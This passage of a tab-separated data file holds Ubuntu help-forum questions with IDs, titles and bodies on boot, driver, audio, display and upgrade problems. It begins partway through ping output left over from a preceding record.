192.0.0.102 : icmp_seq=41 ttl=64 time=0.873 ms 64 bytes from 192.0.0.102 : icmp_seq=42 ttl=64 time=0.914 ms 64 bytes from 192.0.0.102 : icmp_seq=43 ttl=64 time=0.817 ms 64 bytes from 192.0.0.102 : icmp_seq=44 ttl=64 time=0.806 ms 64 bytes from 192.0.0.102 : icmp_seq=45 ttl=64 time=0.821 ms 64 bytes from 192.0.0.102 : icmp_seq=46 ttl=64 time=0.858 ms 64 bytes from 192.0.0.102 : icmp_seq=47 ttl=64 time=0.814 ms 64 bytes from 192.0.0.102 : icmp_seq=48 ttl=64 time=0.902 ms 64 bytes from 192.0.0.102 : icmp_seq=49 ttl=64 time=0.863 ms 64 bytes from 192.0.0.102 : icmp_seq=50 ttl=64 time=0.951 ms 64 bytes from 192.0.0.102 : icmp_seq=51 ttl=64 time=0.919 ms 64 bytes from 192.0.0.102 : icmp_seq=52 ttl=64 time=0.879 ms 64 bytes from 192.0.0.102 : icmp_seq=53 ttl=64 time=0.815 ms 64 bytes from 192.0.0.102 : icmp_seq=54 ttl=64 time=0.815 ms 64 bytes from 192.0.0.102 : icmp_seq=55 ttl=64 time=0.813 ms 64 bytes from 192.0.0.102 : icmp_seq=56 ttl=64 time=0.929 ms 64 bytes from 192.0.0.102 : icmp_seq=57 ttl=64 time=0.809 ms 64 bytes from 192.0.0.102 : icmp_seq=58 ttl=64 time=1.03 ms 64 bytes from 192.0.0.102 : icmp_seq=59 ttl=64 time=0.919 ms 64 bytes from 192.0.0.102 : icmp_seq=60 ttl=64 time=0.815 ms 64 bytes from 192.0.0.102 : icmp_seq=61 ttl=64 time=0.810 ms 64 bytes from 192.0.0.102 : icmp_seq=62 ttl=64 time=0.824 ms 64 bytes from 192.0.0.102 : icmp_seq=63 ttl=64 time=0.814 ms 64 bytes from 192.0.0.102 : icmp_seq=64 ttl=64 time=0.791 ms 64 bytes from 192.0.0.102 : icmp_seq=65 ttl=64 time=0.805 ms 64 bytes from 192.0.0.102 : icmp_seq=66 ttl=64 time=0.836 ms 64 bytes from 192.0.0.102 : icmp_seq=67 ttl=64 time=0.869 ms 64 bytes from 192.0.0.102 : icmp_seq=68 ttl=64 time=0.823 ms 64 bytes from 192.0.0.102 : icmp_seq=69 ttl=64 time=0.827 ms 64 bytes from 192.0.0.102 : icmp_seq=70 ttl=64 time=0.831 ms 64 bytes from 192.0.0.102 : icmp_seq=71 ttl=64 time=0.812 ms 64 bytes from 192.0.0.102 : icmp_seq=72 ttl=64 time=0.805 ms 64 bytes from 192.0.0.102 : icmp_seq=73 ttl=64 time=0.887 ms 64 bytes from 192.0.0.102 : icmp_seq=74 ttl=64 time=0.919 ms 64 bytes from 192.0.0.102 : icmp_seq=75 ttl=64 time=0.836 ms 64 bytes from 192.0.0.102 : icmp_seq=76 ttl=64 time=0.798 ms 64 bytes from 192.0.0.102 : icmp_seq=77 ttl=64 time=0.803 ms 64 bytes from 192.0.0.102 : icmp_seq=78 ttl=64 time=0.808 ms 64 bytes from 192.0.0.102 : icmp_seq=79 ttl=64 time=0.875 ms 64 bytes from 192.0.0.102 : icmp_seq=80 ttl=64 time=0.985 ms 64 bytes from 192.0.0.102 : icmp_seq=83 ttl=255 time=0.765 ms 64 bytes from 192.0.0.102 : icmp_seq=84 ttl=255 time=0.785 ms from 192.0.0.102 icmp_seq=112 destination host unreachable from 192.0.0.102 icmp_seq=113 destination host unreachable from 192.0.0.102 icmp_seq=114 destination host unreachable from 192.0.0.102 icmp_seq=115 destination host unreachable from 192.0.0.102 icmp_seq=116 destination host unreachable from 192.0.0.102 icmp_seq=117 destination host unreachable from 192.0.0.102 icmp_seq=118 destination host unreachable from 192.0.0.102 icmp_seq=119 destination host unreachable 64 bytes from 192.0.0.102 : icmp_seq=122 ttl=64 time=7.23 ms 64 bytes from 192.0.0.102 : icmp_seq=123 ttl=64 time=0.812 ms 64 bytes from 192.0.0.102 : icmp_seq=124 ttl=64 time=0.809 ms 64 bytes from 192.0.0.102 : icmp_seq=125 ttl=64 time=0.812 ms 64 bytes from 192.0.0.102 : icmp_seq=126 ttl=64 time=0.814 ms 64 bytes from 192.0.0.102 : icmp_seq=127 ttl=64 time=0.826 ms 64 bytes from 192.0.0.102 : icmp_seq=128 ttl=64 time=0.814 ms 64 bytes from 192.0.0.102 : icmp_seq=129 ttl=64 time=1.05 ms 64 bytes from 192.0.0.102 : icmp_seq=130 ttl=64 time=0.821 ms 64 bytes from 192.0.0.102 : icmp_seq=131 ttl=64 time=0.826 ms 64 bytes from 192.0.0.102 : icmp_seq=132 ttl=64 time=0.871 ms 64 bytes from 192.0.0.102 : icmp_seq=133 ttl=64 time=0.941 ms 64 bytes from 192.0.0.102 : icmp_seq=134 ttl=64 time=0.822 ms 64 bytes from 192.0.0.102 : icmp_seq=135 ttl=64 time=0.837 ms 64 bytes from 192.0.0.102 : icmp_seq=136 ttl=64 time=0.820 ms 64 bytes from 192.0.0.102 : icmp_seq=137 ttl=64 time=0.812 ms 64 bytes from 192.0.0.102 : icmp_seq=138 ttl=64 time=0.854 ms 64 bytes from 192.0.0.102 : icmp_seq=139 ttl=64 time=0.833 ms 64 bytes from 192.0.0.102 : icmp_seq=140 ttl=64 time=0.827 ms 64 bytes from 192.0.0.102 : icmp_seq=141 ttl=64 time=0.797 ms 64 bytes from 192.0.0.102 : icmp_seq=142 ttl=64 time=0.878 ms 64 bytes from 192.0.0.102 : icmp_seq=143 ttl=64 time=0.869 ms 64 bytes from 192.0.0.102 : icmp_seq=144 ttl=64 time=0.828 ms 64 bytes from 192.0.0.102 : icmp_seq=145 ttl=64 time=0.823 ms 64 bytes from 192.0.0.102 : icmp_seq=146 ttl=64 time=0.798 ms 64 bytes from 192.0.0.102 : icmp_seq=147 ttl=64 time=0.812 ms 64 bytes from 192.0.0.102 : icmp_seq=148 ttl=64 time=0.829 ms 64 bytes from 192.0.0.102 : icmp_seq=149 ttl=64 time=0.940 ms 64 bytes from 192.0.0.102 : icmp_seq=150 ttl=64 time=1009 ms 64 bytes from 192.0.0.102 : icmp_seq=151 ttl=64 time=1.08 ms 64 bytes from 192.0.0.102 : icmp_seq=152 ttl=64 time=1.12 ms 64 bytes from 192.0.0.102 : icmp_seq=153 ttl=64 time=1.07 ms 64 bytes from 192.0.0.102 : icmp_seq=154 ttl=64 time=1.08 ms 64 bytes from 192.0.0.102 : icmp_seq=155 ttl=64 time=1.10 ms 64 bytes from 192.0.0.102 : icmp_seq=156 ttl=64 time=1.08 ms 64 bytes from 192.0.0.102 : icmp_seq=157 ttl=64 time=1.05 ms 64 bytes from 192.0.0.102 : icmp_seq=158 ttl=64 time=1.10 ms 64 bytes from 192.0.0.102 : icmp_seq=159 ttl=64 time=1.09 ms 64 bytes from 192.0.0.102 : icmp_seq=160 ttl=64 time=1.09 ms 64 bytes from 192.0.0.102 : icmp_seq=161 ttl=64 time=1.12 ms 64 bytes from 192.0.0.102 : icmp_seq=162 ttl=64 time=1.08 ms 64 bytes from 192.0.0.102 : icmp_seq=163 ttl=64 time=0.887 ms 64 bytes from 192.0.0.102 : icmp_seq=164 ttl=64 time=0.891 ms 64 bytes from 192.0.0.102 : icmp_seq=165 ttl=64 time=1.21 ms 64 bytes from 192.0.0.102 : icmp_seq=166 ttl=64 time=0.881 ms 64 bytes from 192.0.0.102 : icmp_seq=167 ttl=64 time=0.884 ms 64 bytes from 192.0.0.102 : icmp_seq=168 ttl=64 time=1.12 ms 64 bytes from 192.0.0.102 : icmp_seq=169 ttl=64 time=0.905 ms 64 bytes from 192.0.0.102 : icmp_seq=172 ttl=255 time=0.857 ms 64 bytes from 192.0.0.102 : icmp_seq=173 ttl=255 time=0.649 ms 64 bytes from 192.0.0.102 : icmp_seq=174 ttl=255 time=0.669 ms from 192.0.0.102 icmp_seq=202 destination host unreachable from 192.0.0.102 icmp_seq=203 destination host unreachable from 192.0.0.102 icmp_seq=204 destination host unreachable from 192.0.0.102 icmp_seq=205 destination host unreachable from 192.0.0.102 icmp_seq=206 destination host unreachable from 192.0.0.102 icmp_seq=207 destination host unreachable 64 bytes from 192.0.0.102 : icmp_seq=209 ttl=64 time=1557 ms 64 bytes from 192.0.0.102 : icmp_seq=210 ttl=64 time=557 ms 64 bytes from 192.0.0.102 : icmp_seq=211 ttl=64 time=0.798 ms 64 bytes from 192.0.0.102 : icmp_seq=212 ttl=64 time=0.972 ms 64 bytes from 192.0.0.102 : icmp_seq=213 ttl=64 time=1.13 ms 64 bytes from 192.0.0.102 : icmp_seq=214 ttl=64 time=0.882 ms 64 bytes from 192.0.0.102 : icmp_seq=215 ttl=64 time=0.899 ms 64 bytes from 192.0.0.102 : icmp_seq=216 ttl=64 time=0.912 ms 64 bytes from 192.0.0.102 : icmp_seq=217 ttl=64 time=0.906 ms 64 bytes from 192.0.0.102 : icmp_seq=218 ttl=64 time=1.15 ms 64 bytes from 192.0.0.102 : icmp_seq=219 ttl=64 time=1.27 ms 64 bytes from 192.0.0.102 : icmp_seq=220 ttl=64 time=0.887 ms 64 bytes from 192.0.0.102 : icmp_seq=221 ttl=64 time=0.883 ms 64 bytes from 192.0.0.102 : icmp_seq=222 ttl=64 time=1.10 ms 64 bytes from 192.0.0.102 : icmp_seq=223 ttl=64 time=0.887 ms
510847	hp deskjet 3050a will print but unable to scan .	i was just curious how to set up my hp deskjet 3050a to be able to scan documents to my computer . i am currently running ubuntu 14.04 . i am currently able to print everything to my printer but when i press the scan button it tells me i do not have a computer with the hp software installed . any help is appreciated ! thanks , joe
510850	wine app in tray	i 've just installed a mouse driver app using wine , and when i run the application , the icon of the app appears near the wifi icon ( in windows this appears in the system tray . ) , and when i right click on it , just like windows it has three options : open , exit , about . when i press about it opens the about window and works well , but when i click on open , i get nothing . ps : this is the driver file .
510852	how to discover workstation or server is installed	is there a way to discover if an installed os is workstation or server ? is it just a matter of the packages that are installed or is there some difference that can be detected ?
510854	hp zbook 15 brightness adjustment issue after an update	i am using hp zbook15 . i7 , 4800mq processor with 16gb ram and nvidia quadro 2100m . i am facing a problem , when i update the the driver for hp hotkey support 5.0.27.1 ( 11 jun 2014 ) the function keys fn + f9 and f10 for brightness adjustment does not works and not even from control panel options . please help me to advise how to resolve this issues as i am unable to understand the issue . even hp guys are not helping on this issue . thanks
510856	how to boot load the kernel using efi stub ( efistub ) loader ?	i have ubuntu 14.04 running in uefi mode as only operating system , no dual-boot here . the kernel version is 3.13.0-24-generic . there is an efi partition . in this case the efi partition is not at the default /dev/sda1 but at /dev/sda3 because i did actually convert bios mode to efi mode . i have used the grub-efi-amd64 package , though that actually loads grub boot menu from uefi firmware boot menu ( uefi boot loads \efi\ubuntu\grubx64.efi ) . i want to skip that double boot menu loading step , and boot faster , directly from uefi into the kernel . the ubuntu kernels since 12.10 have `` kernel efi stub loader '' feature . i know i do need to copy the ubuntu kernel to the efi partition ( possibly rename ) and create an entry in uefi boot menu ( for instance using efibootmgr ) . which exact terminal commands are necessary to do this ?
510857	why does server 14.04.1 install the boot loader to my usb drive instead of the hard disk ?	ok , i do n't know that 's what it 's doing . what i know is that , after i finish installing the os , i pull out the thumb drive to reboot , and at that point the computer just sits there . i figure , `` hey , that install must be broke , '' so i put the thumb drive back in there to try again -- and lo , it works ! what gives ? how do i make it stop that ? ! p.s . because you almost have to ask , i 'm using guided lvm with encryption , and i 'm picking the 750 gig hard disk to partition ( not the one gig usb ) , because i do n't think i 'm qualified to decide how to partition my disks and decide what gets installed where . ... then again , it 's starting to feel like i 'm more qualified than the installer . : )
510861	cheese not workin on ubuntu 14.04	cheese booth wo n't work with my creative live pro webcam on 14.04 desktop . i 've tried sudo cheese . nothing but errors . i 've tried gtk . nothing works
510863	building kernel modules with lts 14.04 and eclipse luna 4.4 . why are my gcc build tool includes all screwed up ?	i 'm trying to use ubuntu lts 14.04 and the latest available stable version of eclipse ide , luna ( 4.4 ) for c/c++ developers . after successfully importing an existing makefile project as a c project in eclipse , when i add new code that requires the most typical libraries such as math.h or stdio.h , eclipse compiles with errors showing unresolved includes . if i set the build tools include paths explicitly in the project settings , i can move further without some errors , but it seems the more paths i include the more missing header files appear buried somewhere in the ubuntu source file repos shipped with the standard ubuntu build . does anyone have a clear definition of what the eclipse project settings should look like to use gcc as a compiler to build kernel modules with the eclipse ide in ubuntu 14.04 lts ? any help appreciated . aidan
510866	nautilus no window bar after upgrade to 14.04	after upgrading today to 14.04 from 12.04 , i noticed that nautilus has no window bar . other programs has it . can someone please show me what i needed to do to restore it ? screenshot :
510868	have found the problem but what is the cure - network hard drive	i have dual booted my system to run xubuntu and ubuntu . after experiencing problems playing dvd 's i found the fix and downloaded libdevread64 decypter for dvd 's . be warned that installing destroys any network link to a hard drive . when i freshly installed ubuntu and xubuntu it saw my network hard drive without a problem after installing libdevread links on both systems have destroyed network drive access . i can see the icons for the hard drive but no constantly get 'connection refused errors ' . any ideas please ?
510869	can not save in sublime text 2 if i use unity launcher	when i open sublime from the launcher and try to save to a file i cloned from github it says `` unable to save '' followed by the filepath . if i open sublime from the terminal , i am able to save . do you have any idea what is going on ?
510871	how do i set a gtk default font ?	i 'm trying to set the gtk default font to dejavu sans 11 . in ~/.gtkrc ( and ~/.gtkrc-2.0 ) i have # ~/.gtkrc-2.0 style `` all '' { font_name= '' dejavu sans 11 '' } widget_class `` * '' style `` all '' gtk-font-name= '' dejavu sans 11 '' but if i run the following c code , i get a value of `` sans 10 '' const char *name = `` gtk-font-name '' ; gchar *value = null ; gtksettings* settings = gtk_settings_get_default ( ) ; g_object_get ( settings , name , & value , null ) ; /* gives : value == `` sans 10 '' */ i 've also set everything i can in gnome-tweak-tool , and the following works : $ gsettings get org.gnome.desktop.interface font-name 'dejavu sans 11' so how come gtksettings is n't reporting the right font ? is there another key somewhere i 've missed ? this is ubuntu `` precise '' running an xfce desktop if it helps : $ uname -rv 3.5.0-54-generic # 81~precise1-ubuntu smp tue jul 15 04:02:22 utc 2014 $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.5 lts ''
510876	ubuntu on android mini pc ?	is there a way i could get ubuntu ( any version ) on my keyii android 4.1 mini pc ? i heard that other people did it .
510879	multiple sound source playback broken after pithos	i have an odd situation . i have a recently installed kubuntu 14.04 that i 've been using as a work environment . it 's not uncommon for me to use pianobar or mpd to provide background music , but still use videos in my browser , or hangouts at the same time . i 've been able to any and as many sources at once as i wanted until i tried installing pithos ( a gui pandora player ) . after doing so , i can no longer use mpd or pianobar concurrently with other sound sources . i uninstalled the packages that were installed with pithos as such : sudo apt-get remove gstreamer0.10-plugins-bad libcdaudio1 libgstreamer-plugins-bad0.10-0 libslv2-9 pithos python-gst0.10 python-libxml2 python-xdg and even tried completely purging alsa-base and pulseaudio then reinstalling them with the kubuntu-desktop metapackage . still nothing . i would like to regain factory audio functionality without reinstalling my os , which is what i usually have to resort to when pulseaudio misbehaves . it would appear that pulseaudio is losing exclusive control of the sound device , perhaps ? not even the audio 'pop ' sounds play when i adjust the volume while mpd/pianobar is running . below are some of the other questions i 've referred to : multiple audio issues sound , stopping between multiple programs update : this seems to work somewhat : rm -r ~/.config/pulse ; pulseaudio -k starting pianobar before starting a pulse-compatible source still seems to lock the output , but starting it after works , as long as the pulse source does n't stop playing . mpd is still exclusive -- either mpd or pulse , but not both . i 've also lost the volume-change sound completely .
510880	why does directory contain 2 hard links	when i create a new directory it contain 2 hard links and when i go inside to the new directory it contain two directories ( . and .. ) . has hard link count 2 and .. has hard link count 3 , but i learn that directory can not contain more than one hard link . can anyone explain this scenario ?
510889	cjpeg fails `` unrecognized file input format -- - perhaps you need -targa ''	i 'm using 14.04.1 lts ( server ) , i have installed the following : libjpeg8 libjpeg62 libjpeg-turbo8 libjpeg-progs libjpeg-turbo-progs the image file in question returns this with the file command ( i split into two lines ) : image.jpg jpeg image data , jfif standard 1.01 , comment : `` creator : gd-jpeg v1.0 ( using ijg jpeg v62 ) , quality = 100 '' when i run cjpeg image.jpg i get the following error : unrecognized input file format -- - perhaps you need -targa following the advice , i run cjpeg -targa image.jpg : invalid or unsupported targa file searching google brought up a lot of source code files for various packages that call cjpeg and had bits of the error message in question spread throughout the file but nothing referenced the same error i am getting .
510890	how to redirect bash command output to vim	i am trying to redirect the output of a bash command into a new file . if i try the pipe as below : ls -la | vim bash shows me the errors : vim : error reading input , exiting ... vim : preserving files ... vim : finished . i know that i can open vim and then use : : r ! ls -la but is there a way to do this in bash itself , so that vim is opened and the output is pasted there automatically ?
510891	grub menu is not displayed	previously i used dual boot ubuntu12.04 and windows8 . i updated to 14.04 due to which my grub menu shows 12.04 , 14.04 and windows 8 . i removed windows8 , yet the grub menu shows it.so i removed the windows8 from the /boot/grub/grub.cfg menu . there happened some error due to which now the grub screen is not displayed . how can i reinstall or reconfigure it ?
510893	super key not working on ubuntu 14.04	i have recently upgraded my os from ubuntu 12.04 ( 32bit ) to ubuntu 14.04 ( 32 bit ) . but after upgrading , the super key is not working . how can i remap the key ?
510897	intel ssd bug : unbootable after sleep mode with low battery . need to backup data	after putting my notebook to sleep while it was on a low battery state i pluged my cable in and turned it on again . then i got error messages about writing data to swap , ssd superblock and i/o errors on my intel ssd . i 've already found a way to erase the ssd and make it work again ( image or reset broken ssd ) . but i need to find a way to backup or view my data . the data on my ssd is really important for me ( bachelor thesis ) . plz help me guys any ideas are welcome . here are some information i got using a livecd : fdisk -l fdisk -l disk /dev/sda : 8 mb , 8388608 bytes 255 heads , 63 sectors/track , 1 cylinders , total 16384 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda does n't contain a valid partition table hdparm -i /dev/sda hdparm -i /dev/sda /dev/sda : ata device , with non-removable media model number : intel ssdsa2bw120g3a serial number : bad_ctx 00000150 firmware revision : 4pc10302 transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 standards : used : unknown ( minor revision code 0x0029 ) supported : 8 7 6 5 likely used : 8 configuration : logical max current cylinders 16383 16 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16128 lba user addressable sectors : 16384 lba48 user addressable sectors : 16384 logical sector size : 512 bytes physical sector size : 512 bytes device size with m = 1024*1024 : 8 mbytes device size with m = 1000*1000 : 8 mbytes cache/buffer size = unknown nominal media rotation rate : solid state device capabilities : lba , iordy ( can be disabled ) standby timer values : spec 'd by standard , no device specific minimum r/w multiple sector transfer : max = 16 current = 1 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * nop cmd * download_microcode set_max security extension * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * general purpose logging feature set * write_ { dma|multiple } _fua_ext * 64-bit world wide name * idle_immediate with unload * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * phy event counters * software settings preservation * smart command transport ( sct ) feature set * sct lba segment access ( ac2 ) * sct error recovery control ( ac3 ) * sct features control ( ac4 ) * sct data tables ( ac5 ) * data set management trim supported ( limit 8 blocks ) * deterministic read zeros after trim security : master password revision code = 65534 supported not enabled not locked frozen not expired : security count supported : enhanced erase 2min for security erase unit . 2min for enhanced security erase unit . logical unit wwn device identifier : 500151795954bb60 naa : 5 ieee oui : 001517 unique id : 95954bb60 checksum : correct
510899	installed ubuntu and now my windows 8 installation is no longer recognized ?	i installed the latest version of ubuntu last night on my lenovo t440s and ubuntu runs perfectly . in fact , the only reason i need to get back onto windows is for my files , but now windows 8 does not show up from my boot order and even the systems restore features only recognize ubuntu as my only operating system . while i was on windows i used easybcd to change my boot order and allow me to boot ubuntu but now it 's the only thing that shows up . help ! ! !
510901	how to print mesaage on virtual console after logging out	i want to print a message and prevent clear screen when i log out from a user in virtual console . please help !
510909	boot back to windows ( or anything )	i installed ubuntu 13.00 on my pc wiping windows for the pc . a huge mistake as ubuntu 13 did n't work as unity did n't load . when ubuntu 14.04 came out i upgraded by using the terminal and unity loaded again but it was incredibly slow so i installed lxde which is ok but still slow . but i have really had enough and i ca n't do a clean install if ubuntu or zorin or windows because my cd drive has somehow disappeared from the bios and the pc ca n't boot to usb . when the pc was running windows i had plop boot manager to boot to usb but now it is gone i have no idea how to boot into a new os . i 've looked to see if i can boot an iso from grub or install plop on the pc but the tutorials make absolutely no sense so i need help to : 1.fix the cd drive ( in the bios ) or 2 . boot windows/linux iso from grub2 or 3 . install plop boot manager to grub 2/pc clear simple instructions would be appreciated as i have n't got the hang of linux yet
510913	how to set a memory limit for a specific process ?	i tried to execute mpiexec -16 ... on a 384 gb ram server , but it induced oom killer and was aborted . how can i set a memory limit for mpiexec execution ? i know ulimit , but it might affect other processes . thank you .
510915	problems to boot ubuntu partition after updating bios from my windows partition	i have a toshiba satellite laptop l50-b-18e . so , one day the toshiba center asked me to update the bios , and i did . but now the menu that asks me what system do i want to start does n't appear anymore . so i do n't know how to boot from my ubuntu partition . the bios startup menu does n't say anything about partitions and the toshiba service tells me that they only deal with windows problems . thanks for your help and excuse my poor english .
510917	can not find windows 7 in grub anymore	i 'm not able to find windows 7 in the grub anymore . tried grub reinstall , boot repair etc . more details are available in below url created by boot repair tool . http : //paste.ubuntu.com/8037517/ appreciate your help on this.. joe
510921	how do i remove a usb device ?	i 've got a controller hooked up that is a pain to unplug . it 's a steering wheel with pedals and in some applications/games it acts like i 'm holding down on a joystick . when i 'm in windows i simply open devices & printers , right click the icon for the steering wheel and select remove . how can i do this on ubuntu ? preferably with an easy command i can alias .
510925	ca n't boot ubuntu 12.04 in graphics mode or safe graphics mode	i can boot into ubuntu only in tty screen non-graphics mode only . my machince is with intel onboard dg33 graphics . i have already run these commands without any error . sudo apt-get remove xserver-xorg sudo apt-get -- purge xserver-xorg sudo apt-get install xserver-xorg sudo dpkg-reconfigure xserver-xorg all commands run fine , but in normal mode it just hangs in the middle and in recovery mode it boots in to black login screen . thanks
510927	how to restore accidentally deleted /usr/share/applications folder ?	i was going to delete a desktop shortcut but i accidentally deleted all even folder itself . now when i log in , it just show wallpaper.is there any way to back ?
510932	how to see list of ascii code on the terminal	once on a web site , i saw one command which shows the list of all ascii codes on the terminal . but now i forgot that website and also that command . i need the list of them . is there a command which shows the list of ascii codes on the terminal ?
510933	weird wubi.exe installation ?	i would like to get ubuntu on my old laptop ( hp compaq ) . so i ran the installation and it completed ( i installed 13.04 with the wubi installer ) . when i booted it up , it went to the login screen . this part gets weird : instead of it saying my username with a password box under it , it says login : with a box under it . i type in my username and password and it says failed ! it also says `` localhost.localdomain '' in the corner . i did n't install the server version of ubuntu and im typing in the right username and password but it keeps saying failed . i can go to guest account but i can hardly do anything . i cant even configure my wireless settings ! and for some reason ubuntu corrupted windows 7 that was on the computer because when i try to hit the option windows 7 it says `` starting windows '' and that 's it . what do i do ? is there a way without reinstalling ubuntu ? any help would be greatly appreciated . -inky
510934	how does a keylogger respond when the user switches profiles	i 'm wanting to log keystrokes on this ubuntu computer and i was wondering how a keylogger program responds when the user goes from a default user account and then logs in as root or vice versa . for example consider the below activity . if the user issues all these commands will the keylogger still capture all activity even though the user is switching in and out of a different user account . user @ host > su # user logs in as root password : ******** # user enters password root @ host > # user issues some commands root @ host > exit # user exits root and returns to default user user @ host > # user issues some commands
510935	ffmpeg unkown libfaac ubuntu 14.04	i have installed ffmpeg 2.3 in ubuntu 14.04 ffmpeg -i demo.mpg -acodec libfaac demo.mp4 ffmpeg version 2.3 copyright ( c ) 2000-2014 the ffmpeg developers built on aug 13 2014 22:15:33 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 ) configuration : libavutil 52 . 92.100 / 52 . 92.100 libavcodec 55 . 69.100 / 55 . 69.100 libavformat 55 . 48.100 / 55 . 48.100 libavdevice 55 . 13.102 / 55 . 13.102 libavfilter 4 . 11.100 / 4 . 11.100 libswscale 2 . 6.100 / 2 . 6.100 libswresample 0 . 19.100 / 0 . 19.100 input # 0 , mpeg , from 'demo.mpg ' : duration : 00:04:19.96 , start : 0.000000 , bitrate : 1646 kb/s stream # 0:0 [ 0x1c0 ] : audio : mp2 , 44100 hz , stereo , s16p , 128 kb/s stream # 0:1 [ 0x1e0 ] : video : mpeg1video , yuv420p ( tv ) , 640x480 [ sar 1:1 dar 4:3 ] , 104857 kb/s , 29.97 fps , 29.97 tbr , 90k tbn , 29.97 tbc unknown encoder 'libfaac' also i have installed libavcodec-extra-54 linux : ~ $ apt-cache policy libavcodec-extra-54 libavcodec-extra-54 : installed : 7:1.2.6-1~trusty1 candidate : 7:1.2.6-1~trusty1 version table : *** 7:1.2.6-1~trusty1 0 i have no idea what to do now to convert videos with acodec libfaac
510938	ubuntu 14.04 no signal to television	i have two different laptops with ubuntu14.04 . one is a dell latitude d610 x32 the other is a hp g62 x64 . when i connect the dell laptop to the tv , svga connection , the tv gets signal and shows my desktop up to when i logon , then the tv no longer gets signal from the laptop . then when i shut down the tv once again gets signal . the tv always got signal with this laptop while it had windows xp on it . i have tried connecting the hp laptop with both svga and hdmi and always get signal . with the svga connected i get multiple desktops on the tv . with the hdmi connection i get nothing but the desktop wallpaper on the tv . none of the files/shortcuts i have on the desktop show up nor does any program that i may have open . any ideas ?
510943	frames twiching between two states on occasion	sometimes the unity window frame twitches between two states , the new and a previous one . i am quite sure it does n't affect the whole screen only the active window . it stops when i switch my workspace to a different one . sorry but i do n't know how to reproduce this , just hope someone has or has had the same problem . even updating nvidia 's drivers did not fix the issue . specs : os - ubuntu 14.04 video card - nvidia geforce 9600gt graphics driver - nvidia binary 334.21/340.32 ( open source )
510945	ubuntu 14.04 display issue from vmware console	i wonder if some can help with my problem . i am moving over my business infrastructure from microsoft products to ubuntu 14.04 , although i am also trialling centos and straight debian too . i currently have everything running on a pair of vmware 4.1 hosts running on two dell pe2950iii servers ( 2xquad intel zeons and 64gb ram each ) . both hosts are current as far as updates are concerned . everything is going ok apart from an issue with the ubuntu desktop when accessed via vcenter console - if i set the display to anything higher than 800x600 the screen and launcher is duplicated every 800 pixels to the right . this also covers anything that should be there . i understand that ubuntu 14.04 uses 3d acceleration which i 'm sure the standard vmware display driver does n't support . i have tried every video ram setting in vsphere and every possible screen resolution within ubuntu over 800x600 and still get the same affect . i have installed the open_vm_tools package with no luck . i have seen a few suggestions of moving down to an earlier version but i would like to get 14.04 working if possible . as a beginner i like the ease of use that ubuntu gives me while i 'm learning . thanks guys .
510946	problems upgrading from 12.04 to 14.04	i 'm a complete linux newbie using ubuntu 12.04 on my laptop and now wanting to upgrade to 14.04 . i 'm having some issues and have tried googling my way out . i would really appreciate some advice but please treat me as though i am a moron as i have very little experience with linux : - ( i 'm really sorry to do a `` tl ; dr '' as my first post but i do n't know what is relevant and what 's not . i tried to do the upgrade from update manager but got this message : third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . followed by this message : the upgrade has aborted . the upgrade needs a total of 2,195 m free space on disk '/ ' . please free at least an additional 891 m of disk space on '/ ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . the point at which the above happened was at `` setting new software channels '' i emptied my rubbish bin and did sudo apt-get clean as instructed ; nothing happened in the terminal after that though . i 'm not sure where '/ ' is and what i should delete on it ? nevertheless , i then tried to reinstall using update manager again but the results were the same . i then googled a bit and did this in terminal : sudo update-manager -d and got this : warning : root : nothing unsupported running 0 ( 0 ) it then brought up update manager again anyway , so i clicked on upgrade again , as per my first step , but results were the same . thanks . the output of df -h is : filesystem size used avail use % mounted on /dev/sda1 7.4g 5.8g 1.3g 83 % / udev 932m 4.0k 932m 1 % /dev tmpfs 188m 920k 187m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 939m 19m 921m 2 % /run/shm /dev/sda6 220g 31g 178g 15 % /home really basic qu here but how do i remove things from /. ? i also did as below , and tried the upgrade again , but same results sudo apt-get autoremove & & sudo apt-get autoclean [ sudo ] password for fibie : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed gettext libtommath0 ttf-droid ttf-umefont ttf-unfonts-core wine-gecko1.8 wine-gecko1.9 0 to upgrade , 0 to newly install , 7 to remove and 0 not to upgrade . after this operation , 41.1 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 278209 files and directories currently installed . ) removing gettext ... removing libtommath0 ... removing ttf-droid ... removing ttf-umefont ... removing ttf-unfonts-core ... removing wine-gecko1.8 ... removing wine-gecko1.9 ... processing triggers for install-info ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place reading package lists ... done building dependency tree reading state information ... done thanks this was originally a windows pc , but i thought i uninstalled windows . i do n't get offered the option of booting into windows at start-up . i do n't want or need windows . thanks : - ) how do i resize the / partition ? i just tried sudo do-release-upgrade the output was huge but ultimately the result was the same and upgrade aborted .
510953	ubuntu 14.04 touch screen not working after latest kernel upgrade	i have dell inspiron 15r and every thing was working right until yesterday that installed the latest updates ( which included a new kernel 3.13.0-33-generic ) ; and the touch screen is not working anymore . i clues on how to debug this issue and/or collect information to report the bug ?
